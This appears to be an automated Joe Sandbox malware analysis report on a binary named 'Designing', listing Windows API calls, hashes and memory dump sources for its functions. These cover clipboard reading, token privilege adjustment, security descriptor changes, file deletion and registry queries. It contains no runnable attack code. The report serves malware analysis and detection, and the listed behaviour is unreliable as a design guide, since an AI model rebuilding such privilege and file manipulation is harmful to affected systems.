                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: d4da4f2fa68fa9374a5d6a05f6f6d8a44130f12bec67e862c2520b3816d8ffb6
                                                                                                                                                                              • Instruction ID: 83d8e9ec05db2352ce147e7f35a5f173555c3487fb8de22bbae90e55ff0f7d82
                                                                                                                                                                              • Opcode Fuzzy Hash: d4da4f2fa68fa9374a5d6a05f6f6d8a44130f12bec67e862c2520b3816d8ffb6
                                                                                                                                                                              • Instruction Fuzzy Hash: F7F0B432551E2567EB315A26FC05F7B3749EF417A0F184017B804AB298DA21D80146F0
                                                                                                                                                                              APIs
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00DC6A79,?,0000015D,?,?,?,?,00DC85B0,000000FF,00000000,?,?), ref: 00DD3BC5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                              • Opcode ID: ab55880500d89b73eade3b26fd0b4478a046a36a476e48bc1278f2e44aff9947
                                                                                                                                                                              • Instruction ID: 1a26baa15ef7a361544bcc0e9c8007daf5689e4a43912aff9fe15a7682b569ad
                                                                                                                                                                              • Opcode Fuzzy Hash: ab55880500d89b73eade3b26fd0b4478a046a36a476e48bc1278f2e44aff9947
                                                                                                                                                                              • Instruction Fuzzy Hash: 26E0652124162166DA316676FC05F5B7A48DF413A0F1A0167EC46AB691DB70DD40C5B6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0bc92cd67943ff3b7c03e86adea4abe9a154ee11f7114ca8f0fd2bf215ab5f2c
                                                                                                                                                                              • Instruction ID: 948383babf70527fdf7a7d8b75450cf5a1dcea7e40e07f995dbc3aa521cae546
                                                                                                                                                                              • Opcode Fuzzy Hash: 0bc92cd67943ff3b7c03e86adea4abe9a154ee11f7114ca8f0fd2bf215ab5f2c
                                                                                                                                                                              • Instruction Fuzzy Hash: 7AF039B1105B42CFCB349F65E8A4816BBE4BF15369328897EE1DA87A10C772D844DF60
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __fread_nolock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2638373210-0
                                                                                                                                                                              • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                              • Instruction ID: 8b51bdfa3bd211f8fb15046a9d5848a265e0cc5b8bba6b76f2b68e94df15c35b
                                                                                                                                                                              • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                              • Instruction Fuzzy Hash: D7F0F87550024DFFDF05DF90C941E9E7B79FB04318F248449F9159A151C376EA21ABA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00DA3963
                                                                                                                                                                              Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
APIs
• GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00DA3A76
  • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
APIs
• CreateFileW.KERNEL32(00000000,00000000,?,00DE0A84,?,?,00000000,?,00DE0A84,00000000,0000000C), ref: 00DE0737
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• GetFileAttributesW.KERNEL32(?,00E0D840), ref: 00E0EAB1
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
  • Part of subcall function 00E0DC54: FindFirstFileW.KERNEL32(?,?), ref: 00E0DCCB
  • Part of subcall function 00E0DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00E0DD1B
  • Part of subcall function 00E0DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E0DD2C
  • Part of subcall function 00E0DC54: FindClose.KERNEL32(00000000), ref: 00E0DD43
• GetLastError.KERNEL32 ref: 00E1666E
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
• String ID:
• API String ID: 2191629493-0
APIs
  • Part of subcall function 00E02010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E0205A
  • Part of subcall function 00E02010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E02087
  • Part of subcall function 00E02010: GetLastError.KERNEL32 ref: 00E02097
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00E01BD2
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00E01BF4
• CloseHandle.KERNEL32(?), ref: 00E01C05
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E01C1D
• GetProcessWindowStation.USER32 ref: 00E01C36
• SetProcessWindowStation.USER32(00000000), ref: 00E01C40
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E01C5C
  • Part of subcall function 00E01A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E01B48), ref: 00E01A20
  • Part of subcall function 00E01A0B: CloseHandle.KERNEL32(?,?,00E01B48), ref: 00E01A35
Strings
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0$j
• API String ID: 22674027-2615587742
APIs
  • Part of subcall function 00E01A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E01A60
  • Part of subcall function 00E01A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A6C
  • Part of subcall function 00E01A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A7B
  • Part of subcall function 00E01A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E014E7,?,?,?), ref: 00E01A82
  • Part of subcall function 00E01A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E01A99
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E01518
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E0154C
• GetLengthSid.ADVAPI32(?), ref: 00E01563
• GetAce.ADVAPI32(?,00000000,?), ref: 00E0159D
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E015B9
• GetLengthSid.ADVAPI32(?), ref: 00E015D0
• GetProcessHeap.KERNEL32(00000008,00000008), ref: 00E015D8
• HeapAlloc.KERNEL32(00000000), ref: 00E015DF
• GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E01600
• CopySid.ADVAPI32(00000000), ref: 00E01607
• AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E01636
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E01658
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E0166A
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E01691
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E01698
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E016A1
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E016A8
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E016B1
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E016B8
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00E016C4
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00E016CB
                                                                                                                                                                                • Part of subcall function 00E01ADF: GetProcessHeap.KERNEL32(00000008,00E014FD,?,00000000,?,00E014FD,?), ref: 00E01AED
                                                                                                                                                                                • Part of subcall function 00E01ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00E014FD,?), ref: 00E01AF4
                                                                                                                                                                                • Part of subcall function 00E01ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00E014FD,?), ref: 00E01B03
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4175595110-0
                                                                                                                                                                              • Opcode ID: b83258824ce4c47540e392f93acfba966a9d421d91258b8854540997d28bea78
                                                                                                                                                                              • Instruction ID: 457e2483e5bb83b13b15deb72e79b911e5e5c6fd0bd104e8cdb809660ae7a71f
                                                                                                                                                                              • Opcode Fuzzy Hash: b83258824ce4c47540e392f93acfba966a9d421d91258b8854540997d28bea78
                                                                                                                                                                              • Instruction Fuzzy Hash: AC717AB2900209AFDF10DFA5EC48FAEBBB9BF04714F084555F915BB190D7329A49CBA0
APIs
• OpenClipboard.USER32(00E3DCD0), ref: 00E1F586
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00E1F594
• GetClipboardData.USER32(0000000D), ref: 00E1F5A0
• CloseClipboard.USER32 ref: 00E1F5AC
• GlobalLock.KERNEL32(00000000), ref: 00E1F5E4
• CloseClipboard.USER32 ref: 00E1F5EE
• GlobalUnlock.KERNEL32(00000000), ref: 00E1F619
• IsClipboardFormatAvailable.USER32(00000001), ref: 00E1F626
• GetClipboardData.USER32(00000001), ref: 00E1F62E
• GlobalLock.KERNEL32(00000000), ref: 00E1F63F
• GlobalUnlock.KERNEL32(00000000), ref: 00E1F67F
• IsClipboardFormatAvailable.USER32(0000000F), ref: 00E1F695
• GetClipboardData.USER32(0000000F), ref: 00E1F6A1
• GlobalLock.KERNEL32(00000000), ref: 00E1F6B2
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00E1F6D4
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E1F6F1
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00E1F72F
• GlobalUnlock.KERNEL32(00000000), ref: 00E1F750
• CountClipboardFormats.USER32 ref: 00E1F771
• CloseClipboard.USER32 ref: 00E1F7B6
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
• String ID:
• API String ID: 420908878-0
• Opcode ID: 9bcec20ef5f2c37c23b5150c324b6da44599cab2dad42f5fb0f7d957a1196c8e
• Instruction ID: 70d9b771924342da259d2a6576d6eb568623f4fb7e8d8997fc6408045e16571d
• Opcode Fuzzy Hash: 9bcec20ef5f2c37c23b5150c324b6da44599cab2dad42f5fb0f7d957a1196c8e
• Instruction Fuzzy Hash: 6561A1312042059FD300EF21EC89FAABBE4EF84718F14556DF456A72A2DB31DD89CBA1
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00E17403
• FindClose.KERNEL32(00000000), ref: 00E17457
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E17493
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E174BA
  • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00E174F7
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00E17524
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
• String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
• API String ID: 3830820486-3289030164
• Opcode ID: c687bcd4fd271892cae94832312002b8224990235ad63c9a7adb7df77bf177ad
• Instruction ID: c794eeccb09a24052bbcf597a765afb85aa8c144a0484c63b5d17eda91bc299e
• Opcode Fuzzy Hash: c687bcd4fd271892cae94832312002b8224990235ad63c9a7adb7df77bf177ad
• Instruction Fuzzy Hash: 7AD14D72508304AEC710EB64C895EAFB7ECEF99704F44091DF586D6292EB74DA48CB72
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E1A0A8
• GetFileAttributesW.KERNEL32(?), ref: 00E1A0E6
• SetFileAttributesW.KERNEL32(?,?), ref: 00E1A100
• FindNextFileW.KERNEL32(00000000,?), ref: 00E1A118
• FindClose.KERNEL32(00000000), ref: 00E1A123
• FindFirstFileW.KERNEL32(*.*,?), ref: 00E1A13F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E1A18F
• SetCurrentDirectoryW.KERNEL32(00E67B94), ref: 00E1A1AD
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00E1A1B7
• FindClose.KERNEL32(00000000), ref: 00E1A1C4
• FindClose.KERNEL32(00000000), ref: 00E1A1D4
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 6ba3c1cb2d78948bf4eaf691c2e7c1580ba788d1d7c4aceccc2a0e87625805d4
• Instruction ID: 1e51b0321b7f47fd476804bf822103a440fbf3ea59cd5657b6714c5b00a13f9a
• Opcode Fuzzy Hash: 6ba3c1cb2d78948bf4eaf691c2e7c1580ba788d1d7c4aceccc2a0e87625805d4
• Instruction Fuzzy Hash: 7931E27260621D7FDB10AFB5EC4DAEE77ACAF05364F1411A5E815F30A0EB70DE848A21
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E14785
• _wcslen.LIBCMT ref: 00E147B2
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00E147E2
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E14803
• RemoveDirectoryW.KERNEL32(?), ref: 00E14813
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E1489A
• CloseHandle.KERNEL32(00000000), ref: 00E148A5
• CloseHandle.KERNEL32(00000000), ref: 00E148B0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
• Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E1A203
• FindNextFileW.KERNEL32(00000000,?), ref: 00E1A25E
• FindClose.KERNEL32(00000000), ref: 00E1A269
• FindFirstFileW.KERNEL32(*.*,?), ref: 00E1A285
• SetCurrentDirectoryW.KERNEL32(?), ref: 00E1A2D5
• SetCurrentDirectoryW.KERNEL32(00E67B94), ref: 00E1A2F3
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00E1A2FD
• FindClose.KERNEL32(00000000), ref: 00E1A30A
• FindClose.KERNEL32(00000000), ref: 00E1A31A
  • Part of subcall function 00E0E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E0E3B4
Strings
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
APIs
  • Part of subcall function 00E2D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2C10E,?,?), ref: 00E2D415
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D451
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4C8
  • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2C99E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00E2CA09
• RegCloseKey.ADVAPI32(00000000), ref: 00E2CA2D
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E2CA8C
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E2CB47
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E2CBB4
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E2CC49
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00E2CC9A
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00E2CD43
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E2CDE2
• RegCloseKey.ADVAPI32(00000000), ref: 00E2CDEF
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
• API String ID: 3102970594-0
APIs
  • Part of subcall function 00DA5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA55D1,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DA5871
  • Part of subcall function 00E0EAB0: GetFileAttributesW.KERNEL32(?,00E0D840), ref: 00E0EAB1
• FindFirstFileW.KERNEL32(?,?), ref: 00E0D9CD
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00E0DA88
• MoveFileW.KERNEL32(?,?), ref: 00E0DA9B
• DeleteFileW.KERNEL32(?,?,?,?), ref: 00E0DAB8
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00E0DAE2
  • Part of subcall function 00E0DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00E0DAC7,?,?), ref: 00E0DB5D
• FindClose.KERNEL32(00000000,?,?,?), ref: 00E0DAFE
• FindClose.KERNEL32(00000000), ref: 00E0DB0F
Strings
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
APIs
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00E02010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E0205A
  • Part of subcall function 00E02010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E02087
  • Part of subcall function 00E02010: GetLastError.KERNEL32 ref: 00E02097
• ExitWindowsEx.USER32(?,00000000), ref: 00E0F249
Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                              • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                              • API String ID: 2234035333-3163812486
                                                                                                                                                                              • Opcode ID: c3141d49796ced023b791799cced653ae24abc47e75edb38875c527cf6a484ac
                                                                                                                                                                              • Instruction ID: ef23b26f1c49fbc3b80b26479f47cad3491e81954249cb263ee2045b1b73b8d5
                                                                                                                                                                              • Opcode Fuzzy Hash: c3141d49796ced023b791799cced653ae24abc47e75edb38875c527cf6a484ac
                                                                                                                                                                              • Instruction Fuzzy Hash: 3701497A6153146FEB3462F8AC8AFFF72AC9B08348F151431FD02F20F1D9604CA592A0
                                                                                                                                                                              APIs
                                                                                                                                                                              • DefDlgProcW.USER32(?,?), ref: 00DA233E
                                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00DA2421
                                                                                                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00DA2434
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Color$Proc
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 929743424-2063206799
                                                                                                                                                                              • Opcode ID: 7ce0c0af598311cb80008f14e07e9c43f2718f20f02cfb337e6d84c40e37cc2b
